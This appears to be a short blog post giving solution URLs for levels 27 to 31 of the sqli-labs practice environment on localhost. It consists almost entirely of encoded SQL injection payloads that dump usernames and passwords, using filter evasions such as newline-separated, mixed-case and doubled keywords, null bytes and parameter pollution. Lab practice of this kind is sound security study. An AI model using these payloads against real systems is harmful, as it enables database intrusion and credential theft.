Less-27:
http://localhost/sqlilabs/Less-27/?id=0%27%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_concat(concat_ws(%27-%27,id,username,password))%0Afrom%0Ausers%0A%0A),3;%00
Less-27a
http://localhost/sqlilabs/Less-27a/?id=0%22%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_concat(concat_ws(%27-%27,id,username,password))%0Afrom%0Ausers%0A%0A),3;%00
Less-28:
http://localhost/sqlilabs/Less-28/?id=0%27)%0Aunion%0Aunion%0Aselect%0Aselect%0A1,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users);%00
Less-28a:
http://localhost/sqlilabs/Less-28a/?id=0%27)%0Aunion%0Aunion%0Aselect%0Aselect%0A1,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users);%00
Less-29:
http://localhost/sqlilabs/Less-29/index.php?id=1&id=-1%27%20union%20select%201,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users);%00
Less-30:
http://localhost/sqlilabs/Less-30/?id=1&id=-1%22%20union%20select%201,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users)%20--+
Less-31:
http://localhost/sqlilabs/Less-31/?id=1&id=-1%22)union%20select%201,(select%0Agroup_concat(username)%0Afrom%0Asecurity.users),(select%0Agroup_concat(password)%0Afrom%0Asecurity.users);%00
1255

被折叠的 条评论
为什么被折叠?



